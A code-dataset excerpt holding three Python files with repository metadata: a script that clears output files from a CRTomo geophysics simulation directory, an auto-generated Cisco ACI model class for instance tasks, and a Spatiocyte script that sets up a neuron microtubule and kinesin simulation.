471b28b164af5875eb9670ed6bdea81faaa98ba6 | 9d1c9a81520437122d9f2f012c2737e4dd22713c | /src/td_clean.py | 0b0e3a8e8ad9f059d56a6f5f5dd04748362a15f8 | [
"MIT"
] | permissive | geophysics-ubonn/crtomo_tools | 136aa39a8a0d92061a739ee3723b6ef7879c57b8 | aa73a67479c4e96bc7734f88ac7b35a74b5d158c | refs/heads/master | 2023-08-24T01:55:29.517285 | 2023-08-08T13:03:46 | 2023-08-08T13:03:46 | 142,049,690 | 2 | 9 | MIT | 2019-06-06T12:46:42 | 2018-07-23T17:54:24 | Standard ML | UTF-8 | Python | false | false | 1,791 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Clean a simulation directory of all modeling/inversion files
"""
import numpy as np
import os
import glob
def main():
rm_list = []
required_files_inversion = (
'exe/crtomo.cfg',
'grid/elem.dat',
'grid/elec.dat',
'mod/volt.dat')
clean_inv = np.all([os.path.isfile(x) for x in required_files_inversion])
if clean_inv:
rm_list += glob.glob('inv/*')
rm_list += [
'exe/error.dat',
'exe/crtomo.pid',
'exe/variogram.gnu',
'exe/inv.elecpositions',
'exe/inv.gstat',
'exe/inv.lastmod',
'exe/inv.lastmod_rho',
'exe/inv.mynoise_pha',
'exe/inv.mynoise_rho',
'exe/inv.mynoise_voltages',
'exe/tmp.kfak',
'overview.png',
]
required_files_modelling = (
'exe/crmod.cfg',
'grid/elem.dat',
'grid/elec.dat',
'config/config.dat',
'rho/rho.dat'
)
clean_mod = np.all([os.path.isfile(x) for x in required_files_modelling])
if clean_mod:
rm_list += glob.glob('mod/sens/*')
rm_list += glob.glob('mod/pot/*')
rm_list += ['mod/volt.dat', ]
rm_list += ['exe/crmod.pid', ]
for filename in rm_list:
if os.path.isfile(filename):
# print('Removing file {0}'.format(filename))
os.remove(filename)
plot_files = (
'rho.png',
'imag.png',
'real.png',
'phi.png',
'cov.png',
'fpi_imag.png',
'fpi_phi.png',
'fpi_real.png',
)
for filename in plot_files:
if os.path.isfile(filename):
os.remove(filename)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
60d9422069f85a93dcee9aecd46120c3a7253c69 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/tag/insttask.py | e2820118edd9b39d43659c40ce0995dfd34ecc0b | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 16,985 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class InstTask(Mo):
"""
An instance task.
"""
meta = ClassMeta("cobra.model.tag.InstTask")
meta.moClassName = "tagInstTask"
meta.rnFormat = "tagInstTask-%(id)s"
meta.category = MoCategory.TASK
meta.label = "None"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.parentClasses.add("cobra.model.action.TopomgrSubj")
meta.parentClasses.add("cobra.model.action.ObserverSubj")
meta.parentClasses.add("cobra.model.action.VmmmgrSubj")
meta.parentClasses.add("cobra.model.action.SnmpdSubj")
meta.parentClasses.add("cobra.model.action.ScripthandlerSubj")
meta.parentClasses.add("cobra.model.action.ConfelemSubj")
meta.parentClasses.add("cobra.model.action.EventmgrSubj")
meta.parentClasses.add("cobra.model.action.OspaelemSubj")
meta.parentClasses.add("cobra.model.action.VtapSubj")
meta.parentClasses.add("cobra.model.action.OshSubj")
meta.parentClasses.add("cobra.model.action.DhcpdSubj")
meta.parentClasses.add("cobra.model.action.ObserverelemSubj")
meta.parentClasses.add("cobra.model.action.DbgrelemSubj")
meta.parentClasses.add("cobra.model.action.VleafelemSubj")
meta.parentClasses.add("cobra.model.action.NxosmockSubj")
meta.parentClasses.add("cobra.model.action.DbgrSubj")
meta.parentClasses.add("cobra.model.action.AppliancedirectorSubj")
meta.parentClasses.add("cobra.model.action.OpflexpSubj")
meta.parentClasses.add("cobra.model.action.BootmgrSubj")
meta.parentClasses.add("cobra.model.action.AeSubj")
meta.parentClasses.add("cobra.model.action.PolicymgrSubj")
meta.parentClasses.add("cobra.model.action.ExtXMLApiSubj")
meta.parentClasses.add("cobra.model.action.OpflexelemSubj")
meta.parentClasses.add("cobra.model.action.PolicyelemSubj")
meta.parentClasses.add("cobra.model.action.IdmgrSubj")
meta.superClasses.add("cobra.model.action.RInst")
meta.superClasses.add("cobra.model.pol.ComplElem")
meta.superClasses.add("cobra.model.task.Inst")
meta.superClasses.add("cobra.model.action.Inst")
meta.rnPrefixes = [
('tagInstTask-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "data", "data", 52, PropCategory.REGULAR)
prop.label = "Data"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("data", prop)
prop = PropMeta("str", "descr", "descr", 33, PropCategory.REGULAR)
prop.label = "Description"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "endTs", "endTs", 15575, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("endTs", prop)
prop = PropMeta("str", "fail", "fail", 46, PropCategory.REGULAR)
prop.label = "Fail"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("fail", prop)
prop = PropMeta("str", "id", "id", 5642, PropCategory.REGULAR)
prop.label = "ID"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("ConfDef", "confdef", 4)
prop._addConstant("none", "none", 0)
meta.props.add("id", prop)
prop = PropMeta("str", "invErrCode", "invErrCode", 49, PropCategory.REGULAR)
prop.label = "Remote Error Code"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("ERR-FILTER-illegal-format", None, 1140)
prop._addConstant("ERR-FSM-no-such-state", None, 1160)
prop._addConstant("ERR-HTTP-set-error", None, 1551)
prop._addConstant("ERR-HTTPS-set-error", None, 1552)
prop._addConstant("ERR-MO-CONFIG-child-object-cant-be-configured", None, 1130)
prop._addConstant("ERR-MO-META-no-such-object-class", None, 1122)
prop._addConstant("ERR-MO-PROPERTY-no-such-property", None, 1121)
prop._addConstant("ERR-MO-PROPERTY-value-out-of-range", None, 1120)
prop._addConstant("ERR-MO-access-denied", None, 1170)
prop._addConstant("ERR-MO-deletion-rule-violation", None, 1107)
prop._addConstant("ERR-MO-duplicate-object", None, 1103)
prop._addConstant("ERR-MO-illegal-containment", None, 1106)
prop._addConstant("ERR-MO-illegal-creation", None, 1105)
prop._addConstant("ERR-MO-illegal-iterator-state", None, 1100)
prop._addConstant("ERR-MO-illegal-object-lifecycle-transition", None, 1101)
prop._addConstant("ERR-MO-naming-rule-violation", None, 1104)
prop._addConstant("ERR-MO-object-not-found", None, 1102)
prop._addConstant("ERR-MO-resource-allocation", None, 1150)
prop._addConstant("ERR-aaa-config-modify-error", None, 1520)
prop._addConstant("ERR-acct-realm-set-error", None, 1513)
prop._addConstant("ERR-add-ctrlr", None, 1574)
prop._addConstant("ERR-admin-passwd-set", None, 1522)
prop._addConstant("ERR-api", None, 1571)
prop._addConstant("ERR-auth-issue", None, 1548)
prop._addConstant("ERR-auth-realm-set-error", None, 1514)
prop._addConstant("ERR-authentication", None, 1534)
prop._addConstant("ERR-authorization-required", None, 1535)
prop._addConstant("ERR-connect", None, 1572)
prop._addConstant("ERR-create-domain", None, 1562)
prop._addConstant("ERR-create-keyring", None, 1560)
prop._addConstant("ERR-create-role", None, 1526)
prop._addConstant("ERR-create-user", None, 1524)
prop._addConstant("ERR-delete-domain", None, 1564)
prop._addConstant("ERR-delete-role", None, 1528)
prop._addConstant("ERR-delete-user", None, 1523)
prop._addConstant("ERR-domain-set-error", None, 1561)
prop._addConstant("ERR-http-initializing", None, 1549)
prop._addConstant("ERR-incompat-ctrlr-version", None, 1568)
prop._addConstant("ERR-internal-error", None, 1540)
prop._addConstant("ERR-invalid-args", None, 1569)
prop._addConstant("ERR-invalid-domain-name", None, 1582)
prop._addConstant("ERR-ldap-delete-error", None, 1510)
prop._addConstant("ERR-ldap-get-error", None, 1509)
prop._addConstant("ERR-ldap-group-modify-error", None, 1518)
prop._addConstant("ERR-ldap-group-set-error", None, 1502)
prop._addConstant("ERR-ldap-set-error", None, 1511)
prop._addConstant("ERR-missing-method", None, 1546)
prop._addConstant("ERR-modify-ctrlr-access", None, 1567)
prop._addConstant("ERR-modify-ctrlr-dvs-version", None, 1576)
prop._addConstant("ERR-modify-ctrlr-rootcont", None, 1575)
prop._addConstant("ERR-modify-ctrlr-scope", None, 1573)
prop._addConstant("ERR-modify-ctrlr-trig-inventory", None, 1577)
prop._addConstant("ERR-modify-domain", None, 1563)
prop._addConstant("ERR-modify-domain-encapmode", None, 1581)
prop._addConstant("ERR-modify-domain-enfpref", None, 1578)
prop._addConstant("ERR-modify-domain-mcastpool", None, 1579)
prop._addConstant("ERR-modify-domain-mode", None, 1580)
prop._addConstant("ERR-modify-role", None, 1527)
prop._addConstant("ERR-modify-user", None, 1525)
prop._addConstant("ERR-modify-user-domain", None, 1565)
prop._addConstant("ERR-modify-user-role", None, 1532)
prop._addConstant("ERR-no-buf", None, 1570)
prop._addConstant("ERR-passwd-set-failure", None, 1566)
prop._addConstant("ERR-provider-group-modify-error", None, 1519)
prop._addConstant("ERR-provider-group-set-error", None, 1512)
prop._addConstant("ERR-radius-global-set-error", None, 1505)
prop._addConstant("ERR-radius-group-set-error", None, 1501)
prop._addConstant("ERR-radius-set-error", None, 1504)
prop._addConstant("ERR-request-timeout", None, 1545)
prop._addConstant("ERR-role-set-error", None, 1515)
prop._addConstant("ERR-secondary-node", None, 1550)
prop._addConstant("ERR-service-not-ready", None, 1539)
prop._addConstant("ERR-set-password-strength-check", None, 1543)
prop._addConstant("ERR-store-pre-login-banner-msg", None, 1521)
prop._addConstant("ERR-tacacs-enable-error", None, 1508)
prop._addConstant("ERR-tacacs-global-set-error", None, 1507)
prop._addConstant("ERR-tacacs-group-set-error", None, 1503)
prop._addConstant("ERR-tacacs-set-error", None, 1506)
prop._addConstant("ERR-user-account-expired", None, 1536)
prop._addConstant("ERR-user-set-error", None, 1517)
prop._addConstant("ERR-xml-parse-error", None, 1547)
prop._addConstant("communication-error", "communication-error", 1)
prop._addConstant("none", "none", 0)
meta.props.add("invErrCode", prop)
prop = PropMeta("str", "invErrDescr", "invErrDescr", 50, PropCategory.REGULAR)
prop.label = "Remote Error Description"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("invErrDescr", prop)
prop = PropMeta("str", "invRslt", "invRslt", 48, PropCategory.REGULAR)
prop.label = "Remote Result"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "not-applicable"
prop._addConstant("capability-not-implemented-failure", "capability-not-implemented-failure", 16384)
prop._addConstant("capability-not-implemented-ignore", "capability-not-implemented-ignore", 8192)
prop._addConstant("capability-not-supported", "capability-not-supported", 32768)
prop._addConstant("capability-unavailable", "capability-unavailable", 65536)
prop._addConstant("end-point-failed", "end-point-failed", 32)
prop._addConstant("end-point-protocol-error", "end-point-protocol-error", 64)
prop._addConstant("end-point-unavailable", "end-point-unavailable", 16)
prop._addConstant("extend-timeout", "extend-timeout", 134217728)
prop._addConstant("failure", "failure", 1)
prop._addConstant("fru-identity-indeterminate", "fru-identity-indeterminate", 4194304)
prop._addConstant("fru-info-malformed", "fru-info-malformed", 8388608)
prop._addConstant("fru-not-ready", "fru-not-ready", 67108864)
prop._addConstant("fru-not-supported", "fru-not-supported", 536870912)
prop._addConstant("fru-state-indeterminate", "fru-state-indeterminate", 33554432)
prop._addConstant("fw-defect", "fw-defect", 256)
prop._addConstant("hw-defect", "hw-defect", 512)
prop._addConstant("illegal-fru", "illegal-fru", 16777216)
prop._addConstant("intermittent-error", "intermittent-error", 1073741824)
prop._addConstant("internal-error", "internal-error", 4)
prop._addConstant("not-applicable", "not-applicable", 0)
prop._addConstant("resource-capacity-exceeded", "resource-capacity-exceeded", 2048)
prop._addConstant("resource-dependency", "resource-dependency", 4096)
prop._addConstant("resource-unavailable", "resource-unavailable", 1024)
prop._addConstant("service-not-implemented-fail", "service-not-implemented-fail", 262144)
prop._addConstant("service-not-implemented-ignore", "service-not-implemented-ignore", 131072)
prop._addConstant("service-not-supported", "service-not-supported", 524288)
prop._addConstant("service-protocol-error", "service-protocol-error", 2097152)
prop._addConstant("service-unavailable", "service-unavailable", 1048576)
prop._addConstant("sw-defect", "sw-defect", 128)
prop._addConstant("task-reset", "task-reset", 268435456)
prop._addConstant("timeout", "timeout", 8)
prop._addConstant("unidentified-fail", "unidentified-fail", 2)
meta.props.add("invRslt", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "oDn", "oDn", 51, PropCategory.REGULAR)
prop.label = "Subject DN"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("oDn", prop)
prop = PropMeta("str", "operSt", "operSt", 15674, PropCategory.REGULAR)
prop.label = "Completion"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "scheduled"
prop._addConstant("cancelled", "cancelled", 3)
prop._addConstant("completed", "completed", 2)
prop._addConstant("crashsuspect", "crash-suspect", 7)
prop._addConstant("failed", "failed", 4)
prop._addConstant("indeterminate", "indeterminate", 5)
prop._addConstant("processing", "processing", 1)
prop._addConstant("ready", "ready", 8)
prop._addConstant("scheduled", "scheduled", 0)
prop._addConstant("suspended", "suspended", 6)
meta.props.add("operSt", prop)
prop = PropMeta("str", "originMinority", "originMinority", 54, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("originMinority", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "runId", "runId", 45, PropCategory.REGULAR)
prop.label = "ID"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("runId", prop)
prop = PropMeta("str", "startTs", "startTs", 36, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("startTs", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "try", "try", 15574, PropCategory.REGULAR)
prop.label = "Try"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("try", prop)
prop = PropMeta("str", "ts", "ts", 47, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("ts", prop)
meta.namingProps.append(getattr(meta.props, "id"))
def __init__(self, parentMoOrDn, id, markDirty=True, **creationProps):
namingVals = [id]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
4dacaa30f927134d67f697ebba2cba98678ea517 | efbcdc04e5d2d5917328e23f62f0e2b3b585d393 | /neuron/analog2digital/soma_mt.py | 00beb221c13630b51bd31d82783f2be5ac20ea72 | [] | no_license | satya-arjunan/spatiocyte-models | 7e43457a170348638998a1382410c00e2d091cd6 | b5c29b6be758e971ba016d0334670c2afafd2c31 | refs/heads/master | 2021-01-17T00:39:29.965797 | 2018-09-06T07:46:17 | 2018-09-06T07:46:17 | 11,064,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,501 | py | import numpy as np
import math
volumes = [5.8822e-18]
T = 540000
#nKinesin = 35*2.258e-17/volumes[0]
nKinesin = 100
pPlusEnd_Detach = 1
VoxelRadius = 0.8e-8
nNeurite = 5
nNeuriteMT = 5
EdgeSpace = VoxelRadius*5
neuriteRadius = 0.2e-6
MTRadius = 12.5e-9
KinesinRadius = 0.4e-8
Filaments = 13
neuriteSpace = neuriteRadius*2
somaLength = nNeurite*neuriteRadius*2+neuriteSpace*(nNeurite+1)
somaWidth = somaLength
somaHeight = neuriteRadius*4
inSomaLength = VoxelRadius*6
neuriteLengths = np.empty((nNeurite))
neuriteLengths.fill(5e-6+inSomaLength)
neuriteLengths[0] = 25e-6
neuriteLengths[1] = 20e-6
neuriteLengths[2] = 15e-6
neuriteLengths[3] = 10e-6
neuriteLengths[4] = 5e-6
rootSpace = VoxelRadius*20
rootLengths = np.empty((1,3))
rootLengths = (somaWidth+np.amax(neuriteLengths)-inSomaLength+rootSpace*2,
somaLength+rootSpace*2, somaHeight+rootSpace*2)
neuriteOrigins = np.zeros((nNeurite, 3))
halfRootLengths = np.divide(rootLengths, 2.0)
somaOrigin = np.zeros((nNeurite, 3))
somaOrigin = (rootSpace+somaWidth/2, rootSpace+somaLength/2,
rootSpace+somaHeight/2)
with np.errstate(divide='ignore', invalid='ignore'):
somaOrigin = np.divide(np.subtract(somaOrigin, halfRootLengths),
halfRootLengths)
somaOrigin[somaOrigin == np.inf] = 0
somaOrigin = np.nan_to_num(somaOrigin)
for i in range(nNeurite):
neuriteOrigins[i] = np.array([rootSpace+somaWidth+(neuriteLengths[i]-
inSomaLength)/2,
rootSpace+neuriteSpace+i*(neuriteRadius*2+neuriteSpace)+neuriteRadius,
rootSpace+somaHeight/2])
with np.errstate(divide='ignore', invalid='ignore'):
neuriteOrigins[i] = np.divide(np.subtract(neuriteOrigins[i],
halfRootLengths), halfRootLengths)
neuriteOrigins[i][neuriteOrigins[i] == np.inf] = 0
neuriteOrigins[i] = np.nan_to_num(neuriteOrigins[i])
def rotatePointAlongVector(P, C, N, angle):
x = P[0]
y = P[1]
z = P[2]
a = C[0]
b = C[1]
c = C[2]
u = N[0]
v = N[1]
w = N[2]
u2 = u*u
v2 = v*v
w2 = w*w
cosT = math.cos(angle)
oneMinusCosT = 1-cosT
sinT = math.sin(angle)
xx = (a*(v2+w2)-u*(b*v+c*w-u*x-v*y-w*z))*oneMinusCosT+x*cosT+(
-c*v+b*w-w*y+v*z)*sinT
yy = (b*(u2+w2)-v*(a*u+c*w-u*x-v*y-w*z))*oneMinusCosT+y*cosT+(
c*u-a*w+w*x-u*z)*sinT
zz = (c*(u2+v2)-w*(a*u+b*v-u*x-v*y-w*z))*oneMinusCosT+z*cosT+(
-b*u+a*v-v*x+u*y)*sinT
return [xx, yy, zz]
MTLengths = np.zeros(nNeurite)
for i in range(len(neuriteLengths)):
MTLengths[i] = neuriteLengths[i]-2*EdgeSpace
MTsOriginX = np.zeros((nNeurite, nNeuriteMT))
MTsOriginY = np.zeros((nNeurite, nNeuriteMT))
MTsOriginZ = np.zeros((nNeurite, nNeuriteMT))
for i in range(nNeurite):
if(nNeuriteMT == 1):
MTsOriginX[i][0] = 0.0
MTsOriginY[i][0] = 0.0
MTsOriginZ[i][0] = 0.0
elif(nNeuriteMT == 2):
space = (neuriteRadii[i]*2-MTRadius*2*2)/(2+2)
MTsOriginY[i][0] = -1+(space+MTRadius)/neuriteRadii[i]
MTsOriginY[i][1] = 1-(space+MTRadius)/neuriteRadii[i]
elif(nNeuriteMT == 3):
y = neuriteRadii[i]*math.cos(math.pi/3)
y2 = y*math.cos(math.pi/3)
z = y*math.sin(math.pi/3)
MTsOriginY[i][0] = y/neuriteRadii[i]
MTsOriginY[i][1] = -y2/neuriteRadii[i]
MTsOriginZ[i][1] = -z/neuriteRadii[i]
MTsOriginY[i][2] = -y2/neuriteRadii[i]
MTsOriginZ[i][2] = z/neuriteRadii[i]
elif(nNeuriteMT == 4):
space = (neuriteRadius*2-MTRadius*2*2)/(2+3)
MTsOriginY[i][0] = -1+(space+MTRadius)/neuriteRadii[i]
MTsOriginY[i][1] = 1-(space+MTRadius)/neuriteRadii[i]
space = (neuriteRadius*2-MTRadius*2*2)/(2+3)
MTsOriginZ[i][2] = -1+(space+MTRadius)/neuriteRadii[i]
MTsOriginZ[i][3] = 1-(space+MTRadius)/neuriteRadii[i]
else:
MTsOriginY[i][0] = 2*2.0/6;
P = [0.0, MTsOriginY[i][0], 0.0]
C = [0.0, 0.0, 0.0]
N = [1.0, 0.0, 0.0]
angle = 2*math.pi/(nNeuriteMT-1)
for j in range(nNeuriteMT-2):
P = rotatePointAlongVector(P, C, N, angle);
MTsOriginX[i][j+1] = P[0]
MTsOriginY[i][j+1] = P[1]
MTsOriginZ[i][j+1] = P[2]
sim = theSimulator
s = sim.createStepper('SpatiocyteStepper', 'SS')
s.VoxelRadius = VoxelRadius
s.SearchVacant = 1
s.RemoveSurfaceBias = 1
sim.rootSystem.StepperID = 'SS'
sim.createEntity('Variable', 'Variable:/:LENGTHX').Value = rootLengths[0]
sim.createEntity('Variable', 'Variable:/:LENGTHY').Value = rootLengths[1]
sim.createEntity('Variable', 'Variable:/:LENGTHZ').Value = rootLengths[2]
sim.createEntity('Variable', 'Variable:/:VACANT')
#sim.createEntity('System', 'System:/:Surface').StepperID = 'SS'
#sim.createEntity('Variable', 'Variable:/Surface:DIMENSION').Value = 2
#sim.createEntity('Variable', 'Variable:/Surface:VACANT')
sim.createEntity('System', 'System:/:Soma').StepperID = 'SS'
sim.createEntity('Variable', 'Variable:/Soma:GEOMETRY').Value = 0
sim.createEntity('Variable', 'Variable:/Soma:LENGTHX').Value = somaWidth
sim.createEntity('Variable', 'Variable:/Soma:LENGTHY').Value = somaLength
sim.createEntity('Variable', 'Variable:/Soma:LENGTHZ').Value = somaHeight
sim.createEntity('Variable', 'Variable:/Soma:ORIGINX').Value = somaOrigin[0]
sim.createEntity('Variable', 'Variable:/Soma:ORIGINY').Value = somaOrigin[1]
sim.createEntity('Variable', 'Variable:/Soma:ORIGINZ').Value = somaOrigin[2]
sim.createEntity('Variable', 'Variable:/Soma:VACANT').Value = -1
sim.createEntity('System', 'System:/Soma:Surface').StepperID = 'SS'
sim.createEntity('Variable', 'Variable:/Soma/Surface:DIMENSION').Value = 2
sim.createEntity('Variable', 'Variable:/Soma/Surface:VACANT')
for i in range(nNeurite):
sim.createEntity('System', 'System:/:Neurite%d' %i).StepperID = 'SS'
sim.createEntity('Variable', 'Variable:/Neurite%d:GEOMETRY' %i).Value = 2
x = sim.createEntity('Variable', 'Variable:/Neurite%d:LENGTHX' %i)
x.Value = neuriteLengths[i]
y = sim.createEntity('Variable', 'Variable:/Neurite%d:LENGTHY' %i)
y.Value = neuriteRadius*2
x = sim.createEntity('Variable', 'Variable:/Neurite%d:ORIGINX' %i)
x.Value = neuriteOrigins[i][0]
y = sim.createEntity('Variable', 'Variable:/Neurite%d:ORIGINY' %i)
y.Value = neuriteOrigins[i][1]
sim.createEntity('Variable', 'Variable:/Neurite%d:ORIGINZ' %i).Value = 0
sim.createEntity('Variable', 'Variable:/Neurite%d:VACANT' %i)
d = sim.createEntity('Variable', 'Variable:/Neurite%d:DIFFUSIVE' %i)
d.Name = '/:Soma'
# Create the neurite membrane:
sim.createEntity('System', 'System:/Neurite%d:Surface' %i).StepperID = 'SS'
sim.createEntity('Variable',
'Variable:/Neurite%d/Surface:DIMENSION' %i).Value = 2
sim.createEntity('Variable', 'Variable:/Neurite%d/Surface:VACANT' %i)
sim.createEntity('Variable',
'Variable:/Neurite%d/Surface:DIFFUSIVE' %i).Name = '/Soma:Surface'
for j in range(nNeuriteMT):
m = sim.createEntity('MicrotubuleProcess',
'Process:/Neurite%d:Microtubule%d' %(i, j))
m.OriginX = MTsOriginX[i][j]
m.OriginY = MTsOriginY[i][j]
m.OriginZ = MTsOriginZ[i][j]
m.RotateX = 0
m.RotateY = 0
m.RotateZ = 0
m.Radius = MTRadius
m.SubunitRadius = KinesinRadius
m.Length = MTLengths[i]
m.Filaments = Filaments
m.Periodic = 0
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:aTUB']]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB', '-1']]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_M', '-2']]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P', '-3']]
nSomaMT = 16
mtSpaceY = somaLength/(nSomaMT)
for i in range(nSomaMT):
for j in range(3):
OriginZ = 0.0
if(j != 0):
if(j == 1):
OriginZ = 0.5
else:
OriginZ = -0.5
m = theSimulator.createEntity('MicrotubuleProcess',
'Process:/Soma:Microtubule%d%d' %(i,j))
m.OriginX = 0
m.OriginY = (mtSpaceY/2+i*mtSpaceY)/(somaLength/2)-1
m.OriginZ = OriginZ
m.RotateX = 0
m.RotateY = 0
m.RotateZ = 0
m.Radius = MTRadius
m.SubunitRadius = KinesinRadius
m.Length = somaWidth*0.8
m.Filaments = Filaments
m.Periodic = 0
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP' ]]
m.VariableReferenceList = [['_', 'Variable:/Soma:aTUB']]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB', '-1']]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_M', '-2']]
m.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P', '-3']]
sim.createEntity('Variable', 'Variable:/Soma:KIF').Value = nKinesin
sim.createEntity('Variable', 'Variable:/Soma:TUB_GTP' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_KIF' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_KIF_ATP' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_GTP_KIF' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_GTP_KIF_ATP' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:aTUB' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_M' ).Value = 0
sim.createEntity('Variable', 'Variable:/Soma:TUB_P' ).Value = 0
v = sim.createEntity('VisualizationLogProcess', 'Process:/Soma:v')
#v.VariableReferenceList = [['_', 'Variable:/Soma:TUB']]
v.VariableReferenceList = [['_', 'Variable:/Soma:aTUB']]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_M']]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_P']]
v.VariableReferenceList = [['_', 'Variable:/Soma:KIF']]
v.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF' ]]
